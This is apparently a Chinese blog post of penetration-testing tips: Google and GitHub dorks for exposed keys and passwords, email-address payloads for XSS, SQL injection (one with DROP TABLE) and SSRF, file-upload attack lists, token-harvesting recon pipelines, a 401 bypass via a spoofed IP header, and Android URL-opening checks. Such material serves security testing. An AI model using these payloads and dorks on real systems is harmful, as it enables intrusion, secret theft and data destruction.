渗透测试技巧总结
访问隐藏的注册页面
渗透测试过程中很多页面会隐藏注册,可以尝试用这些路径去查找注册页面,成功注册可以访问后台或应用页面去寻找漏洞。
注册路径 | 框架 |
---|---|
/register | Laravel |
/user/register | Drupal |
/wp-login.php?action=register | WordPress |
/register | eZ Publish |
在Burp Suite过滤垃圾的包
Burp Suite>Proxy>Options>TLS Pass Through
.*\.google\.com
.*\.gstatic\.com
.*\.googleapis\.com
.*\.pki\.goog
.*\.mozilla\..*
现在,所有连接到这些主机的底层连接将直接绕过他们,而不通过代理。
Google dorks语法
inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
https://www.exploit-db.com/google-hacking-database
电⼦邮件地址payloads
下⾯的payloads都是有效的电⼦邮件地址,我们可以⽤来对基于⽹络的电⼦邮件系统进⾏测试。
XSS (Cross-Site Scripting):
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
模板注⼊:
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
SQL 注⼊:
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
SSRF (Server-Side Request Forgery):
john.doe@abc123.burpcollaborator.net
john.doe@[127.0.0.1]
(Email) 头注⼊:
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com>\r\nRCPT TO:<victim+"@test.com
文件上传漏洞汇总
以下是上传的⼗⼤列表,你可以通过上传来实现这些类型漏洞。
- ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
- SVG: 存储 XSS / SSRF / XXE
- GIF: 存储 XSS / SSRF
- CSV: CSV 注⼊
- XML: XXE
- AVI: LFI / SSRF
- HTML / JS : HTML 注⼊ / XSS / 开放重定向
- PNG / JPEG: 像素洪⽔攻击 (DoS)
- ZIP: RCE via LFI / DoS
- PDF / PPTX: SSRF / 盲打 XXE
查找javascript⽂件
gau和httpx
这⾥有⼀个侦察技巧,使⽤ gau 和 httpx实⽤程序找到我们目标上托管的javascript⽂件。
echo target.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type
| grep 'application/javascript'
这个组合要做的是,它将从AlienVault的Open Threat Exchange(OTX)、Wayback Machine和Common
Crawl中收集我们⽬标的所有已知URL,使⽤httpx获取它们,然后只显示javascript⽂件。
为了使这个组合⼯作,我们必须安装以下⼯具:
https://github.com/projectdiscovery/httpx
https://github.com/lc/gau
gau
- 收集你的⽬标的所有链接:
cat hosts | sed 's/https\?:\/\///' | gau > urls.txt
- 过滤掉javascript URL:
cat urls.txt | grep -P "\w+\.js(\?|$)" | sort -u > jsurls.txt
- 使⽤ffuf只获取有效的链接,并将其直接发送到Burp中。:
ffuf -mc 200 -w jsurls.txt:HFUZZ -u HFUZZ -replay-proxy http://127.0.0.1:8080
- 使⽤
Scan Check Builder Burp
扩展,添加被动配置⽂件提取 "accessToken
"或 “access_token
”。 - 在Burp中对这些javascript链接运⾏被动扫描。
- 提取发现的令牌,并在报告前对其进⾏验证。
cat hosts | ./gau | cut -d"?" -f1 | grep -E "\.js(?:onp?)?$" | tee urls.txt
使用httpx和subjs收集JavaScript⽂件
cat domains | httpx -silent | subjs | anew
文件上传扩展名
- ASP:
.aspx
.config
.ashx
.asmx
.aspq
.axd
.cshtm
.cshtml
.rem
.soap
.vbhtm
.vbhtml
.asa
.asp
.cer
.shtml
- PHP:
.php
.php5
.php3
.php2
.shtml
.html
.php.png
(double extension attack)
401认证绕过
这是⼀个有趣的提示,可以帮助你找到认证绕过漏洞。
Request:
GET /delete?user=test HTTP/1.1
Response:
HTTP/1.1 401 Unauthorized
现在让我们试试这个。
Request:
GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1
Response:
HTTP/1.1 302 Found
当前端使⽤添加的⾃定义HTTP头(X-Custom-IP-Authorization
)时,这可能会起作⽤–例如,当它被⽤来
识别通过负载均衡器连接到Web服务器的客户端的原始IP地址时。
通过识别⾃⼰是127.0.0.1,我们可能会规避Web应⽤程序的访问控制,并执⾏特权操作。
使⽤GitHub dorks发现secrets
1. “target.com” send_keys
2. “target.com” password
3. “target.com” api_key
4. “target.com” apikey
5. “target.com” jira_password
6. “target.com” root_password
7. “target.com” access_token
8. “target.com” config
9. “target.com” client_secret
10. “target.com” user auth
验证:https://github.com/streaak/keyhacks
图像XSS
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
请注意,这可能只在基于UNIX的系统上⼯作,因为Windows不接受特殊字符作为⽂件名。然而,作为⼀种反射的XSS,它应该普遍适用。
在Android应⽤中打开任意URL
寻找⼀种简单的⽅法来打开Android应⽤中的任意URL?
- 下载jadx反编译器并安装adb。
- 打开AndroidManifest.xml
- 查找所有浏览器活动(必须包含 <category. andoid:name=“android.intent.category.BROWSABLE”/> )。
为每个活动(或您的任何域)运⾏"adb shell am start -n app_package_name/component_name -a android.intent.action.view -d google.com
"。
同时在Burp中跟踪任何对google.com或你的域名的请求。 - 如果⼀个域名被打开,这意味着你发现了⼀个漏洞! 现在检查请求是否包含任何auth令牌(如果是,
说明你的账户被接管了!)。没有?尝试不同的技术来获取任何PII。在最坏的情况下,如果你能在
⼀个应⽤程序中打开任意链接,你会得到像XSS⼀样的奖励。
请注意,我们可以使⽤apktool来代替jadx反编译器,它有更好的能⼒从APK中解码
AndroidManifest.xml⽂件。
如果你使⽤的是Kali Linux,最简单的⽅法就是使⽤apt.apktool来获取所有必要的程序。
apt-get -y install adb jadx apktool
12款安卓安全测试⼯具列表
这是⼀个当今最好的Android安全测试⼯具的集合。
- Dex2JAR - ⼀套⽤于Android Dex和Java CLASS⽂件的⼯具。
- ByteCodeView - Java & Android APK 逆向⼯程套件 (反编译器,编辑器,调试器等)
- JADX - Dex转Java反编译⼯具,⽤于从Android Dex和APK⽂件⽣成Java源代码。
- JD-GUI - ⼀个独⽴的图形化⼯具,⽤于显示来⾃CLASS⽂件的Java源。
- Drozer - ⼀个全⾯的Android安全测试框架。
- Baksmali - Dalvik(Android的Java)使⽤的Dex格式的汇编器/反汇编器。
- AndroGuard - ⼀把⽤于分析、反编译和逆转Android应⽤程序的瑞⼠军⼑。
- ApkTool - 另⼀个反向⼯程Android应⽤程序的瑞⼠军⼑⼯具。
- QARK - ⽤于查找多个安全相关的Android应⽤漏洞的⼯具。
- AndroBugs - 另⼀个⽤于识别Android应⽤程序中安全漏洞的分析⼯具。
- AppMon - ⽤于监控和篡改本地macOS、iOS和Android应⽤的系统API调⽤的⾃动化框架。
- MobSF - ⼀个⽀持Android,iOS和Windows移动应⽤的⼀体化⾃动化移动安全框架。
真的是⼀个了不起的⼯具列表,不仅仅是⽤于Android应⽤的反转!有些擅⻓静态分析,有些⽤于动态
分析,有些则是两者兼⽽有之,但所有这些⼯具都是开源且免费使⽤的。
其中有些擅⻓静态分析,有些⽤于动态分析,有些则是两者兼⽽有之,但所有这些⼯具都是开源的,⽽
且可以免费使⽤
本文来自博客园,作者:知冰,转载请注明原文链接:https://www.cnblogs.com/zhibing/p/16893819.html